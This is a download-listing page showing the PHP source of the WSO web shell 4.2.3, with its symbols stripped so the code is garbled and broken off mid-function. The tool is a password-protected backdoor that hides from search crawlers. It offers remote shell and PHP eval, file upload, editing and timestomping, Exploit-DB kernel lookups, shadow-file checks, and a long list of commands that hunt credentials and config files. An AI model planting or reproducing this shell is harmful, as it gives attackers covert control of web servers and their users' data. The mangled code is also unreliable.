Username:
Password:

Details for "gen1"

Noticegen1
Uploaded2017-07-27 20:57:21
Size1.70 kB
Real NFOShow the real NFO
Web NFO
Show/Hide
?php
//-----------------Password---------------------
a42ca574cac9cb742c0fc61e43ad9a92; //gen123
true;
UTF-8;
FilesMan;
md5(_SERVER[HTTP_USER_AGENT]);
if (!isset(_COOKIE[md5(_SERVER[HTTP_HOST]).key]))
prototype(md5(_SERVER[HTTP_HOST]).key, );
if(empty(_POST[charset]))
_POST[charset] ;
if (!isset(_POST[ne]))
if(isset(_POST[a])) _POST[a] iconv(utf-8, _POST[charset],
decrypt(_POST[a],_COOKIE[md5(_SERVER[HTTP_HOST]).key]));
if(isset(_POST[c])) _POST[c] iconv(utf-8, _POST[charset],
decrypt(_POST[c],_COOKIE[md5(_SERVER[HTTP_HOST]).key]));
if(isset(_POST[p1])) _POST[p1] iconv(utf-8, _POST[charset],
decrypt(_POST[p1],_COOKIE[md5(_SERVER[HTTP_HOST]).key]));
if(isset(_POST[p2])) _POST[p2] iconv(utf-8, _POST[charset],
decrypt(_POST[p2],_COOKIE[md5(_SERVER[HTTP_HOST]).key]));
if(isset(_POST[p3])) _POST[p3] iconv(utf-8, _POST[charset],
decrypt(_POST[p3],_COOKIE[md5(_SERVER[HTTP_HOST]).key]));
function
decrypt(str,pwd)pwdbase64_encode(pwd);strbase64_decode(str);enc_chr;enc_str;i0;while(istrlen(str))for(j0;jstrlen(pwd);j++)enc_chrchr(ord(str[i])ord(pwd[j]));enc_str.enc_chr;i++;if(istrlen(str))break;return
base64_decode(enc_str);
@ini_set(error_log,NULL);
@ini_set(log_errors,0);
@ini_set(max_execution_time,0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define(VERSION, 4.2.3);
if(get_magic_quotes_gpc())
function stripslashes_array(array)
return is_array(array) ? array_map(stripslashes_array, array) : stripslashes(array);
_POST stripslashes_array(_POST);
_COOKIE stripslashes_array(_COOKIE);
/* () 11.2011 oRb */
if(!empty())
if(isset(_POST[pass]) (md5(_POST[pass]) ))
prototype(md5(_SERVER[HTTP_HOST]), );
if (!isset(_COOKIE[md5(_SERVER[HTTP_HOST])]) (_COOKIE[md5(_SERVER[HTTP_HOST])] ! ))
hardLogin();
if(!isset(_COOKIE[md5(_SERVER[HTTP_HOST]) . ajax]))
_COOKIE[md5(_SERVER[HTTP_HOST]) . ajax] (bool);
function hardLogin()
if(!empty(_SERVER[HTTP_USER_AGENT]))
userAgents array(Google, Slurp, MSNBot, ia_archiver, Yandex, Rambler);
if(preg_match(/ . implode(, userAgents) . /i, _SERVER[HTTP_USER_AGENT]))
header(HTTP/1.0 404 Not Found);
exit;
die(pre aligncenterform methodpost stylefont-family:fantasy;Password: input typepassword namepass
stylebackground-color:whitesmoke;border:1px solid #FFF;outline:none; requiredinput typesubmit value
styleborder:none;background-color:#FFDB5F;color:#fff;/form/pre);
if(strtolower(substr(PHP_OS,0,3)) win)
os win;
else
os nix;
safe_mode @ini_get(safe_mode);
if(!safe_mode)
error_reporting(0);
disable_functions @ini_get(disable_functions);
home_cwd @getcwd();
if(isset(_POST[c]))
@chdir(_POST[c]);
cwd @getcwd();
if(os win)
home_cwd str_replace(\\, /, home_cwd);
cwd str_replace(\\, /, cwd);
if(cwd[strlen(cwd)-1] ! /)
cwd . /;
/* () 04.2015 Pirat */
function hardHeader()
if(empty(_POST[charset]))
_POST[charset] GLOBALS[];
echo htmlheadmeta http-equivContent-Type contenttext/html; charset . _POST[charset] . title .
_SERVER[HTTP_HOST] . - WSO . VERSION ./title
style
body background-color:#060a10;color:#e1e1e1;
body,td,thfont:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;
table.infocolor:#C3C3C3;background-color:#060a10;
span,h1,acolor:#fff !important;
spanfont-weight:bolder;
h1border-left:5px solid #2E6E9C;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px;
div.contentpadding:5px;margin-left:5px;background-color:#060a10;
atext-decoration:none;
a:hovertext-decoration:underline;
.tooltip::after background:#0663D5;color:#FFF;content:
attr(data-tooltip);margin-top:-50px;display:block;padding:6px 10px;position:absolute;visibility:hidden;
.tooltip:hover::after opacity:1;visibility:visible;
.ml1border:1px solid #1e252e;padding:5px;margin:0;overflow:auto;
.bigareamin-width:100;max-width:100;height:400px;
input, textarea, selectmargin:0;color:#fff;background-color:#1e252e;border:1px solid #060a10; font:9pt
Courier New;outline:none;
select-webkit-appearance:none;-moz-appearance:none;appearance:none;
label position:relative
label:after content:;font:10px Consolas,
monospace;color:#fff;-webkit-transform:rotate(90deg);-moz-transform:rotate(90deg);-ms-transform:rotate(90deg);transform:rotate(90deg);right:3px;
top:3px;padding:0;position:absolute;pointer-events:none;
label:before content:;right:0; top:0;width:17px;
height:17px;background:#1e252e;position:absolute;pointer-events:none;display:block;
formmargin:0px;
#toolsTbltext-align:center;
#fak background:none;
#fak td padding:5px 0 0 0;
iframeborder:1px solid #060a10;
.toolsInpwidth:300px
.main thtext-align:left;background-color:#060a10;
.main tr:hoverbackground-color:#354252;
.main td, thvertical-align:middle;
input[typesubmit]:hoverbackground-color:#0663D5;
input[typebutton]:hoverbackground-color:#0663D5;
.l1background-color:#1e252e;
prefont:9pt Courier New;
/style
script
var c_ . htmlspecialchars(GLOBALS[cwd]) . ;
var a_ . htmlspecialchars(@_POST[a]) .
var charset_ . htmlspecialchars(@_POST[charset]) .;
var p1_ . ((strpos(@_POST[p1],\n)!false)?:htmlspecialchars(_POST[p1],ENT_QUOTES)) .;
var p2_ . ((strpos(@_POST[p2],\n)!false)?:htmlspecialchars(_POST[p2],ENT_QUOTES)) .;
var p3_ . ((strpos(@_POST[p3],\n)!false)?:htmlspecialchars(_POST[p3],ENT_QUOTES)) .;
var d document;
function encrypt(str,pwd)if(pwdnullpwd.length0)return
null;strbase64_encode(str);pwdbase64_encode(pwd);var enc_chr;var enc_str;var i0;while(istr.length)for(var
j0;jpwd.length;j++)enc_chrstr.charCodeAt(i)pwd.charCodeAt(j);enc_str+String.fromCharCode(enc_chr);i++;if(istr.length)break;return
base64_encode(enc_str);
function utf8_encode(argString)var string(argString+);var
utftext,start,end,stringl0;startend0;stringlstring.length;for(var n0;nstringl;n++)var
c1string.charCodeAt(n);var encnull;if(c1128)end++;else
if(c1127c12048)encString.fromCharCode((c16)192)+String.fromCharCode((c163)128);elseencString.fromCharCode((c112)224)+String.fromCharCode(((c16)63)128)+String.fromCharCode((c163)128);if(enc!null)if(endstart)utftext+string.slice(start,end);utftext+enc;startendn+1;if(endstart)utftext+string.slice(start,stringl);return
utftext;
function base64_encode(data)var b64 ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/;var
o1,o2,o3,h1,h2,h3,h4,bits,i0,ac0,enc,tmp_arr[];if (!data)return
data;datautf8_encode(data+);doo1data.charCodeAt(i++);o2data.charCodeAt(i++);o3data.charCodeAt(i++);bitso116o28o3;h1bits180x3f;h2bits120x3f;h3bits60x3f;h4bits0x3f;tmp_arr[ac++]b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);while(idata.length);enctmp_arr.join();switch
(data.length3)case 1:encenc.slice(0,-2)+;break;case 2:encenc.slice(0,-1)+;break;return enc;
function set(a,c,p1,p2,p3,charset)
if(a!null)d.mf.a.valuea;else d.mf.a.valuea_;
if(c!null)d.mf.c.valuec;else d.mf.c.valuec_;
if(p1!null)d.mf.p1.valuep1;else d.mf.p1.valuep1_;
if(p2!null)d.mf.p2.valuep2;else d.mf.p2.valuep2_;
if(p3!null)d.mf.p3.valuep3;else d.mf.p3.valuep3_;
d.mf.a.value encrypt(d.mf.a.value,._COOKIE[md5(_SERVER[HTTP_HOST]).key].);
d.mf.c.value encrypt(d.mf.c.value,._COOKIE[md5(_SERVER[HTTP_HOST]).key].);
d.mf.p1.value encrypt(d.mf.p1.value,._COOKIE[md5(_SERVER[HTTP_HOST]).key].);
d.mf.p2.value encrypt(d.mf.p2.value,._COOKIE[md5(_SERVER[HTTP_HOST]).key].);
d.mf.p3.value encrypt(d.mf.p3.value,._COOKIE[md5(_SERVER[HTTP_HOST]).key].);
if(charset!null)d.mf.charset.valuecharset;else d.mf.charset.valuecharset_;
function g(a,c,p1,p2,p3,charset)
set(a,c,p1,p2,p3,charset);
d.mf.submit();
function a(a,c,p1,p2,p3,charset)
set(a,c,p1,p2,p3,charset);
var params ajaxtrue;
for(i0;id.mf.elements.length;i++)
params + +d.mf.elements[i].name++encodeURIComponent(d.mf.elements[i].value);
sr( . addslashes(_SERVER[REQUEST_URI]) ., params);
function sr(url, params)
if (window.XMLHttpRequest)
req new XMLHttpRequest();
else if (window.ActiveXObject)
req new ActiveXObject(Microsoft.XMLHTTP);
if (req)
req.onreadystatechange processReqChange;
req.open(POST, url, true);
req.setRequestHeader (Content-Type, application/x-www-form-urlencoded);
req.send(params);
function processReqChange()
if( (req.readyState 4) )
if(req.status 200)
var reg new RegExp(\(\\\\d+)([\\\\S\\\\s]*)\, m);
var arrreg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
else alert(Request error!);
/script
headbodydiv styleposition:absolute;width:100;background-color:#1e252e;top:0;left:0;
form methodpost namemf styledisplay:none;
input typehidden namea
input typehidden namec
input typehidden namep1
input typehidden namep2
input typehidden namep3
input typehidden namecharset
/form;
freeSpace @diskfreespace(GLOBALS[cwd]);
totalSpace @disk_total_space(GLOBALS[cwd]);
totalSpace totalSpace?totalSpace:1;
release @php_uname(r);
kernel @php_uname(s);
explink http://noreferer.de/?http://www.exploit-db.com/search/?actionsearchdescription;
if(strpos(Linux, kernel) ! false)
explink . urlencode(Linux Kernel . substr(release,0,6));
else
explink . urlencode(kernel . . substr(release,0,3));
if(!function_exists(posix_getegid))
user @get_current_user();
uid @getmyuid();
gid @getmygid();
group ?;
else
uid @posix_getpwuid(@posix_geteuid());
gid @posix_getgrgid(@posix_getegid());
user uid[name];
uid uid[uid];
group gid[name];
gid gid[gid];
cwd_links ;
path explode(/, GLOBALS[cwd]);
ncount(path);
for(i0; in-1; i++)
cwd_links . a href# onclickg(\FilesMan\,\;
for(j0; ji; j++)
cwd_links . path[j]./;
cwd_links . \).path[i].//a;
charsets array(UTF-8, Windows-1251, KOI8-R, KOI8-U, cp866);
opt_charsets ;
foreach(charsets as )
opt_charsets . option value.. .(_POST[charset]?selected:).../option;
m array(Sec. InfoSecInfo,FilesFilesMan,ConsoleConsole,InfectInfect,SqlSql,PhpPhp,Safe modeSafeMode,String
toolsStringTools,BruteforceBruteforce,NetworkNetwork);
if(!empty(GLOBALS[]))
m[Logout] Logout;
m[Self remove] SelfRemove;
menu ;
foreach(m as k v)
menu . th[ a href# onclickg(\.v.\,null,\\,\\,\\).k./a ]/th;
drives ;
if (GLOBALS[os] win)
foreach(range(c,z) as drive)
if (is_dir(drive.:\\))
drives . a href# onclickg(\FilesMan\,\.drive.:/\)[ .drive. ]/a ;
/* () 08.2015 dmkcv */
echo table classinfo cellpadding3 cellspacing0 width100trtd
width1spanUname:brUser:brPhp:brHdd:brCwd:.(GLOBALS[os] win?brDrives::)./span/td.
tdnobr.substr(@php_uname(), 0, 120). a
hrefhttp://noreferer.de/?http://www.google.com/search?q.urlencode(@php_uname()). target_blank[ Google ]/a
a href.explink. target_blank[ Exploit-DB ]/a/nobrbr.uid. ( .user. ) spanGroup:/span .gid. ( .group.
)br.@phpversion(). spanSafe mode:/span .(GLOBALS[safe_mode]?font colorredON/font:font
color#FFDB5FbOFF/b/font). a href# onclickg(\Php\,null,null,\info\)[ phpinfo ]/a spanDatetime:/span
.date(Y-m-d H:i:s).br.viewSize(totalSpace). spanFree:/span .viewSize(freeSpace).
(.round(100/(totalSpace/freeSpace),2).)br.cwd_links. .viewPermsColor(GLOBALS[cwd]). a href#
onclickg(\FilesMan\,\.GLOBALS[home_cwd].\,\\,\\,\\)[ home ]/abr.drives./td.
td width1 alignrightnobrlabelselect onchangeg(null,null,null,null,null,this.value)optgroup labelPage
charset.opt_charsets./optgroup/select/labelbrspanServer
IP:/spanbr.gethostbyname(_SERVER[HTTP_HOST]).brspanClient
IP:/spanbr._SERVER[REMOTE_ADDR]./nobr/td/tr/table.
table stylebackground-color:#2E6E9C; cellpadding3 cellspacing0 width100tr.menu./tr/tablediv;
function hardFooter()
is_writable is_writable(GLOBALS[cwd])? font color#FFDB5F[ Writeable ]/font: font colorred(Not
writable)/font;
echo
/div
table classinfo idtoolsTbl cellpadding3 cellspacing0 width100
tr
tdform onsubmit\.( function_exists(actionFilesMan)? g(null,this.c.value,);: ).return false;\spanChange
dir:/spanbrinput classtoolsInp typetext namec value . htmlspecialchars(GLOBALS[cwd]) .input typesubmit
value/form/td
tdform onsubmit\.(function_exists(actionFilesTools)? g(FilesTools,null,this.f.value);: ).return
false;\spanRead file:/spanbrinput classtoolsInp typetext namef requiredinput typesubmit value/form/td
/trtr
tdform onsubmit\.( function_exists(actionFilesMan)? g(FilesMan,null,mkdir,this.d.value);: ).return
false;\spanMake dir:/spanis_writablebrinput classtoolsInp typetext named requiredinput typesubmit
value/form/td
tdform onsubmit\.( function_exists(actionFilesTools)? g(FilesTools,null,this.f.value,mkfile);: ).return
false;\spanMake file:/spanis_writablebrinput classtoolsInp typetext namef requiredinput typesubmit
value/form/td
/trtr
tdform onsubmit\.( function_exists(actionConsole)? g(Console,null,this.c.value);: ).return
false;\spanExecute:/spanbrinput classtoolsInp typetext namec valueinput typesubmit value/form/td
tdform methodpost .( (!function_exists(actionFilesMan))? onsubmit\return false;\ :
).ENCTYPEmultipart/form-data
input typehidden namea valueFilesMan
input typehidden namec value . htmlspecialchars(GLOBALS[cwd]) .
input typehidden namep1 valueuploadFile
input typehidden namene value
input typehidden namecharset value . (isset(_POST[charset])?_POST[charset]:) .
spanUpload file:/spanis_writablebrinput classtoolsInp typefile namef[] multipleinput typesubmit
value/formbr /td
/tr/table/div/body/html;
if (!function_exists(posix_getpwuid) (strpos(GLOBALS[disable_functions], posix_getpwuid)false)) function
posix_getpwuid(p) return false;
if (!function_exists(posix_getgrgid) (strpos(GLOBALS[disable_functions], posix_getgrgid)false)) function
posix_getgrgid(p) return false;
function ex(in)
;
if (function_exists(exec))
@exec(in,);
@join(\n,);
elseif (function_exists(passthru))
ob_start();
@passthru(in);
ob_get_clean();
elseif (function_exists(system))
ob_start();
@system(in);
ob_get_clean();
elseif (function_exists(shell_exec))
shell_exec(in);
elseif (is_resource(f @popen(in,r)))
;
while(!@feof(f))
. fread(f,1024);
pclose(f);
else return Unable to execute command\n;
return (? Query did not return anything\n:);
function viewSize(s)
if(s 1073741824)
return sprintf(1.2f, s / 1073741824 ). GB;
elseif(s 1048576)
return sprintf(1.2f, s / 1048576 ) . MB;
elseif(s 1024)
return sprintf(1.2f, s / 1024 ) . KB;
else
return s . B;
function perms(p)
if ((p 0xC000) 0xC000)i s;
elseif ((p 0xA000) 0xA000)i l;
elseif ((p 0x8000) 0x8000)i -;
elseif ((p 0x6000) 0x6000)i b;
elseif ((p 0x4000) 0x4000)i d;
elseif ((p 0x2000) 0x2000)i c;
elseif ((p 0x1000) 0x1000)i p;
else i u;
i . ((p 0x0100) ? r : -);
i . ((p 0x0080) ? w : -);
i . ((p 0x0040) ? ((p 0x0800) ? s : x ) : ((p 0x0800) ? S : -));
i . ((p 0x0020) ? r : -);
i . ((p 0x0010) ? w : -);
i . ((p 0x0008) ? ((p 0x0400) ? s : x ) : ((p 0x0400) ? S : -));
i . ((p 0x0004) ? r : -);
i . ((p 0x0002) ? w : -);
i . ((p 0x0001) ? ((p 0x0200) ? t : x ) : ((p 0x0200) ? T : -));
return i;
function viewPermsColor(f)
if (!@is_readable(f))
return font color#FF0000b.perms(@fileperms(f))./b/font;
elseif (!@is_writable(f))
return font colorwhiteb.perms(@fileperms(f))./b/font;
else
return font color#FFDB5Fb.perms(@fileperms(f))./b/font;
function hardScandir(dir)
if(function_exists(scandir))
return scandir(dir);
else
dh opendir(dir);
while (false ! (filename readdir(dh)))
files[] filename;
return files;
function which(p)
path ex(which . p);
if(!empty(path))
return path;
return false;
function actionRC()
if(!@_POST[p1])
a array(
uname php_uname(),
php_version phpversion(),
VERSION VERSION,
safemode @ini_get(safe_mode)
);
echo serialize(a);
else
eval(_POST[p1]);
function prototype(k, v)
_COOKIE[k] v;
setcookie(k, v);
function actionSecInfo()
hardHeader();
echo h1Server security information/h1div classcontent;
function showSecParam(n, v)
v trim(v);
if(v)
echo span . n . : /span;
if(strpos(v, \n) false)
echo v . br;
else
echo pre classml1 . v . /pre;
showSecParam(Server software, @getenv(SERVER_SOFTWARE));
if(function_exists(apache_get_modules))
showSecParam(Loaded Apache modules, implode(, , apache_get_modules()));
showSecParam(Disabled PHP Functions, GLOBALS[disable_functions]?GLOBALS[disable_functions]:none);
showSecParam(Open base dir, @ini_get(open_basedir));
showSecParam(Safe mode exec dir, @ini_get(safe_mode_exec_dir));
showSecParam(Safe mode include dir, @ini_get(safe_mode_include_dir));
showSecParam(cURL support, function_exists(curl_version)?enabled:no);
temparray();
if(function_exists(mysql_get_client_info))
temp[] MySql (.mysql_get_client_info().);
if(function_exists(mssql_connect))
temp[] MSSQL;
if(function_exists(pg_connect))
temp[] PostgreSQL;
if(function_exists(oci_connect))
temp[] Oracle;
showSecParam(Supported databases, implode(, , temp));
echo br;
if(GLOBALS[os] nix)
showSecParam(Readable /etc/passwd, @is_readable(/etc/passwd)?yes a href# onclickg(\FilesTools\, \/etc/\,
\passwd\)[view]/a:no);
showSecParam(Readable /etc/shadow, @is_readable(/etc/shadow)?yes a href# onclickg(\FilesTools\, \/etc/\,
\shadow\)[view]/a:no);
showSecParam(OS version, @file_get_contents(/proc/version));
showSecParam(Distr name, @file_get_contents(/etc/issue.net));
if(!GLOBALS[safe_mode])
userful array(gcc,lcc,cc,ld,make,php,perl,python,ruby,tar,gzip,bzip,bzip2,nc,locate,suidperl);
danger
array(kav,nod32,bdcored,uvscan,sav,drwebd,clamd,rkhunter,chkrootkit,iptables,ipfw,tripwire,shieldcc,portsentry,snort,ossec,lidsadm,tcplodg,sxid,logcheck,logwatch,sysmask,zmbscap,sawmill,wormscan,ninja);
downloaders array(wget,fetch,lynx,links,curl,get,lwp-mirror);
echo br;
temparray();
foreach (userful as )
if(which())
temp[] ;
showSecParam(Userful, implode(, ,temp));
temparray();
foreach (danger as )
if(which())
temp[] ;
showSecParam(Danger, implode(, ,temp));
temparray();
foreach (downloaders as )
if(which())
temp[] ;
showSecParam(Downloaders, implode(, ,temp));
echo br/;
showSecParam(HDD space, ex(df -h));
showSecParam(Hosts, @file_get_contents(/etc/hosts));
showSecParam(Mount options, @file_get_contents(/etc/fstab));
else
showSecParam(OS Version,ex(ver));
showSecParam(Account Settings, iconv(CP866, UTF-8,ex(net accounts)));
showSecParam(User Accounts, iconv(CP866, UTF-8,ex(net user)));
echo /div;
hardFooter();
function actionFilesTools()
if( isset(_POST[p1]) )
_POST[p1] urldecode(_POST[p1]);
if(@_POST[p2]download)
if(@is_file(_POST[p1]) @is_readable(_POST[p1]))
ob_start(ob_gzhandler, 4096);
header(Content-Disposition: attachment; filename.basename(_POST[p1]));
if (function_exists(mime_content_type))
type @mime_content_type(_POST[p1]);
header(Content-Type: . type);
else
header(Content-Type: application/octet-stream);
fp @fopen(_POST[p1], r);
if(fp)
while(!@feof(fp))
echo @fread(fp, 1024);
fclose(fp);
exit;
if( @_POST[p2] mkfile )
if(!file_exists(_POST[p1]))
fp @fopen(_POST[p1], w);
if(fp)
_POST[p2] edit;
fclose(fp);
hardHeader();
echo h1File tools/h1div classcontent;
if( !file_exists(@_POST[p1]) )
echo File not exists;
hardFooter();
return;
uid @posix_getpwuid(@fileowner(_POST[p1]));
if(!uid)
uid[name] @fileowner(_POST[p1]);
gid[name] @filegroup(_POST[p1]);
else gid @posix_getgrgid(@filegroup(_POST[p1]));
echo spanName:/span .htmlspecialchars(@basename(_POST[p1])). spanSize:/span
.(is_file(_POST[p1])?viewSize(filesize(_POST[p1])):-). spanPermission:/span .viewPermsColor(_POST[p1]).
spanOwner/Group:/span .uid[name]./.gid[name].br;
echo spanCreate time:/span .date(Y-m-d H:i:s,filectime(_POST[p1])). spanAccess time:/span .date(Y-m-d
H:i:s,fileatime(_POST[p1])). spanModify time:/span .date(Y-m-d H:i:s,filemtime(_POST[p1])).brbr;
if( empty(_POST[p2]) )
_POST[p2] view;
if( is_file(_POST[p1]) )
m array(View, Highlight, Download, Hexdump, Edit, Chmod, Rename, Touch, Frame);
else
m array(Chmod, Rename, Touch);
foreach(m as v)
echo a href# onclickg(null,null,\ . urlencode(_POST[p1]) .
\,\.strtolower(v).\).((strtolower(v)@_POST[p2])?b[ .v. ]/b:v)./a ;
echo brbr;
switch(_POST[p2])
case view:
echo pre classml1;
fp @fopen(_POST[p1], r);
if(fp)
while( !@feof(fp) )
echo htmlspecialchars(@fread(fp, 1024));
@fclose(fp);
echo /pre;
break;
case highlight:
if( @is_readable(_POST[p1]) )
echo div classml1 stylebackground-color: #e1e1e1;color:black;;
oRb @highlight_file(_POST[p1],true);
echo str_replace(array(span ,/span), array(font ,/font),oRb)./div;
break;
case chmod:
if( !empty(_POST[p3]) )
perms 0;
for(istrlen(_POST[p3])-1;i0;--i)
perms + (int)_POST[p3][i]*pow(8, (strlen(_POST[p3])-i-1));
if(!@chmod(_POST[p1], perms))
echo Can\t set permissions!brscriptdocument.mf.p3.value;/script;
clearstatcache();
echo scriptp3_;/scriptform onsubmitg(null,null,\ . urlencode(_POST[p1]) . \,null,this.chmod.value);return
false;input typetext namechmod value.substr(sprintf(o, fileperms(_POST[p1])),-4).input typesubmit
value/form;
break;
case edit:
if( !is_writable(_POST[p1]))
echo File isn\t writeable;
break;
if( !empty(_POST[p3]) )
time @filemtime(_POST[p1]);
_POST[p3] substr(_POST[p3],1);
fp @fopen(_POST[p1],w);
if(fp)
@fwrite(fp,_POST[p3]);
@fclose(fp);
echo Saved!brscriptp3_;/script;
@touch(_POST[p1],time,time);
echo form onsubmitg(null,null,\ . urlencode(_POST[p1]) . \,null,\1\+this.text.value);return
false;textarea nametext classbigarea;
fp @fopen(_POST[p1], r);
if(fp)
while( !@feof(fp) )
echo htmlspecialchars(@fread(fp, 1024));
@fclose(fp);
echo /textareainput typesubmit value/form;
break;
case hexdump:
c @file_get_contents(_POST[p1]);
n 0;
h array(00000000br,,);
len strlen(c);
for (i0; ilen; ++i)
h[1] . sprintf(02X,ord(c[i])). ;
switch ( ord(c[i]) )
case 0: h[2] . ; break;
case 9: h[2] . ; break;
case 10: h[2] . ; break;
case 13: h[2] . ; break;
default: h[2] . c[i]; break;
n++;
if (n 32)
n 0;
if (i+1 len) h[0] . sprintf(08X,i+1).br;
h[1] . br;
h[2] . \n;
echo table cellspacing1 cellpadding5 bgcolor#222trtd bgcolor#1e252espan stylefont-weight:
normal;pre.h[0]./pre/span/tdtd bgcolor#060a10pre.h[1]./pre/tdtd
bgcolor#1e252epre.htmlspecialchars(h[2])./pre/td/tr/table;
break;
case rename:
if( !empty(_POST[p3]) )
if(!@rename(_POST[p1], _POST[p3]))
echo Can\t rename!br;
else
die(scriptg(null,null,.urlencode(_POST[p3]).,null,)/script);
echo form onsubmitg(null,null,\ . urlencode(_POST[p1]) . \,null,this.name.value);return false;input
typetext namename value.htmlspecialchars(_POST[p1]).input typesubmit value/form;
break;
case touch:
if( !empty(_POST[p3]) )
time strtotime(_POST[p3]);
if(time)
if(!touch(_POST[p1],time,time))
echo Fail!;
else
echo Touched!;
else echo Bad time format!;
clearstatcache();
echo scriptp3_;/scriptform onsubmitg(null,null,\ . urlencode(_POST[p1]) . \,null,this.touch.value);return
false;input typetext nametouch value.date(Y-m-d H:i:s, @filemtime(_POST[p1])).input typesubmit
value/form;
break;
/* () 12.2015 mitryz */
case frame:
frameSrc substr(htmlspecialchars(GLOBALS[cwd]), strlen(htmlspecialchars(_SERVER[DOCUMENT_ROOT])));
if (frameSrc[0] ! /)
frameSrc / . frameSrc;
if (frameSrc[strlen(frameSrc) - 1] ! /)
frameSrc frameSrc . /;
frameSrc frameSrc . htmlspecialchars(_POST[p1]);
echo iframe width100 height900px scrollingno src.frameSrc.
onloadonloadheightcontentDocument.body.scrollHeight/iframe;
break;
echo /div;
hardFooter();
if(os win)
aliases array(
List Directory dir,
Find index.php in current dir dir /s /w /b index.php,
Find *config*.php in current dir dir /s /w /b *config*.php,
Show active connections netstat -an,
Show running services net start,
User accounts net user,
Show computers net view,
ARP Table arp -a,
IP Configuration ipconfig /all
);
else
aliases array(
List dir ls -lha,
list file attributes on a Linux second extended file system lsattr -va,
show opened ports netstat -an grep -i listen,
process status ps aux,
Find ,
find all suid files find / -type f -perm -04000 -ls,
find suid files in current dir find . -type f -perm -04000 -ls,
find all sgid files find / -type f -perm -02000 -ls,
find sgid files in current dir find . -type f -perm -02000 -ls,
find config.inc.php files find / -type f -name config.inc.php,
find config* files find / -type f -name \config*\,
find config* files in current dir find . -type f -name \config*\,
find all writable folders and files find / -perm -2 -ls,
find all writable folders and files in current dir find . -perm -2 -ls,
find all service.pwd files find / -type f -name service.pwd,
find service.pwd files in current dir find . -type f -name service.pwd,
find all .htpasswd files find / -type f -name .htpasswd,
find .htpasswd files in current dir find . -type f -name .htpasswd,
find all .bash_history files find / -type f -name .bash_history,
find .bash_history files in current dir find . -type f -name .bash_history,
find all .fetchmailrc files find / -type f -name .fetchmailrc,
find .fetchmailrc files in current dir find . -type f -name .fetchmailrc,
Locate ,
locate httpd.conf files locate httpd.conf,
locate vhosts.conf files locate vhosts.conf,
locate proftpd.conf files locate proftpd.conf,
locate psybnc.conf files locate psybnc.conf,
locate my.conf files locate my.conf,
locate admin.php files locate admin.php,
locate cfg.php files locate cfg.php,
locate conf.php files locate conf.php,
locate config.dat files locate config.dat,
locate config.php files locate config.php,
locate config.inc files locate config.inc,
locate config.inc.php locate config.inc.php,
locate config.default.php files locate config.default.php,
locate config* files locate config,
locate .conf fileslocate .conf,
locate .pwd files locate .pwd,
locate .sql files locate .sql,
locate .htpasswd files locate .htpasswd,
locate .bash_history files locate .bash_history,
locate .mysql_history files locate .mysql_history,
locate .fetchmailrc files locate .fetchmailrc,
locate backup files locate backup,
locate dump files locate dump,
locate priv files locate priv
);
function actionConsole()
if(!empty(_POST[p1]) !empty(_POST[p2]))
prototype(md5(_SERVER[HTTP_HOST]).stderr_to_out, true);
_POST[p1] . 21;
elseif(!empty(_POST[p1]))
prototype(md5(_SERVER[HTTP_HOST]).stderr_to_out, 0);
if(isset(_POST[ajax]))
prototype(md5(_SERVER[HTTP_HOST]).ajax, true);
ob_start();
echo d.cf.cmd.value;\n;
temp @iconv(_POST[charset], UTF-8, addcslashes(\n ._POST[p1].\n.ex(_POST[p1]),\n\r\t\\0));
if(preg_match(!.*cd\s+([;]+)!,_POST[p1],match))
if(@chdir(match[1]))
GLOBALS[cwd] @getcwd();
echo c_.GLOBALS[cwd].;;
echo d.cf.output.value+.temp.;;
echo d.cf.output.scrollTop d.cf.output.scrollHeight;;
temp ob_get_clean();
echo strlen(temp), \n, temp;
exit;
if(empty(_POST[ajax])!empty(_POST[p1]))
prototype(md5(_SERVER[HTTP_HOST]).ajax, 0);
hardHeader();
echo script
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds new Array();
var cur 0;
function kp(e)
var n (window.Event) ? e.which : e.keyCode;
if(n 38)
cur--;
if(cur0)
document.cf.cmd.value cmds[cur];
else
cur++;
else if(n 40)
cur++;
if(cur cmds.length)
document.cf.cmd.value cmds[cur];
else
cur--;
function add(cmd)
cmds.pop();
cmds.push(cmd);
cmds.push();
cur cmds.length-1;
/script;
echo h1Console/h1div classcontentform namecf
onsubmitif(d.cf.cmd.value\clear\)d.cf.output.value\\;d.cf.cmd.value\\;return
false;add(this.cmd.value);if(this.ajax.checked)a(null,null,this.cmd.value,this.show_errors.checked?1:\\);elseg(null,null,this.cmd.value,this.show_errors.checked?1:\\);
return false;labelselect namealias;
foreach(GLOBALS[aliases] as n v)
if(v )
echo optgroup label-.htmlspecialchars(n).-/optgroup;
continue;
echo option value.htmlspecialchars(v)..n./option;
echo /select/labelinput typebutton
onclickadd(d.cf.alias.value);if(d.cf.ajax.checked)a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\\);elseg(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\\);
value nobrinput typecheckbox nameajax value1 .(@_COOKIE[md5(_SERVER[HTTP_HOST]).ajax]?checked:). send
using AJAX input typecheckbox nameshow_errors value1
.(!empty(_POST[p2])_COOKIE[md5(_SERVER[HTTP_HOST]).stderr_to_out]?checked:). redirect stderr to stdout
(21)/nobrbr/textarea classbigarea nameoutput styleborder-bottom:0;margin:0; readonly;
if(!empty(_POST[p1]))
echo htmlspecialchars( ._POST[p1].\n.ex(_POST[p1]));
echo /textareatable styleborder:1px solid #060a10;background-color:#060a10;border-top:0px; cellpadding0
cellspacing0 width100trtd stylepadding-left:4px; width:13px;/tdtdinput typetext namecmd
styleborder:0px;width:100; onkeydownkp(event);/td/tr/table;
echo /form/divscriptd.cf.cmd.focus();/script;
hardFooter();
function actionPhp()
if( isset(_POST[ajax]) )
_COOKIE[md5(_SERVER[HTTP_HOST]).ajax] true;
ob_start();
eval(_POST[p1]);
temp
document.getElementById(PhpOutput).style.display;document.getElementById(PhpOutput).innerHTML.addcslashes(htmlspecialchars(ob_get_clean()),\n\r\t\\\0).;\n;
echo strlen(temp), \n, temp;
exit;
hardHeader();
if( isset(_POST[p2]) (_POST[p2] info) )
echo h1PHP info/h1div classcontent;
ob_start();
phpinfo();
tmp ob_get_clean();
